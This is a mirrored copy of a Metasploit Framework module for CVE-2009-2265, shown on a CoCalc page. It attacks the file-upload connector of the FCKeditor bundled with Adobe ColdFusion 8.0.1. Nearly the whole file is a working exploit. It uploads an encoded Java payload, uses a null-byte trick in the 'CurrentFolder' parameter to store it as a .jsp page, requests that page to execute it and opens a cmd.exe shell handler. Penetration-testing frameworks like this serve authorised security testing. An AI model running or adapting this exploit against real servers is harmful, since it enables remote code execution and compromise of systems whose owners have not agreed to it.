CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/coldfusion_fckeditor.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',

14
      'Description'    => %q{

15
          This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload

16
        and Execute vulnerability.

17
      },

18
      'Author'         => [ 'MC' ],

19
      'License'        => MSF_LICENSE,

20
      'Platform'       => 'win',

21
      'Privileged'     => true,

22
      'References'     =>

23
        [

24
          [ 'CVE', '2009-2265' ],

25
          [ 'OSVDB', '55684'],

26
        ],

27
      'Targets'        =>

28
        [

29
          [ 'Universal Windows Target',

30
            {

31
              'Arch'     => ARCH_JAVA,

32
              'Payload'  =>

33
                {

34
                  'DisableNops' => true,

35
                },

36
            }

37
          ],

38
        ],

39
      'DefaultOptions' =>

40
        {

41
          'SHELL' => 'cmd.exe'

42
        },

43
      'DefaultTarget'  => 0,

44
      'DisclosureDate' => '2009-07-03'

45
    ))

46


47
    register_options(

48
      [

49
        OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),

50
      ])

51
  end

52


53
  def exploit

54


55
    page  = rand_text_alpha_upper(rand(10) + 1) + ".jsp"

56


57
    dbl = Rex::MIME::Message.new

58
    dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")

59
    file = dbl.to_s

60
    file.strip!

61


62
    print_status("Sending our POST request...")

63


64
    res = send_request_cgi(

65
      {

66
        'uri'		=> normalize_uri(datastore['FCKEDITOR_DIR']),

67
        'query'		=> "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",

68
        'version'	=> '1.1',

69
        'method'	=> 'POST',

70
        'ctype'		=> 'multipart/form-data; boundary=' + dbl.bound,

71
        'data'		=> file,

72
      }, 5)

73


74
    if ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ )

75
      print_status("Upload succeeded! Executing payload...")

76


77
      send_request_raw(

78
        {

79
          # default path in Adobe ColdFusion 8.0.1.

80
          'uri'		=> '/userfiles/file/' + page,

81
          'method'	=> 'GET',

82
        }, 5)

83


84
      handler

85
    else

86
      print_error("Upload Failed...")

87
      return

88
    end

89


90
  end

91
end

92


93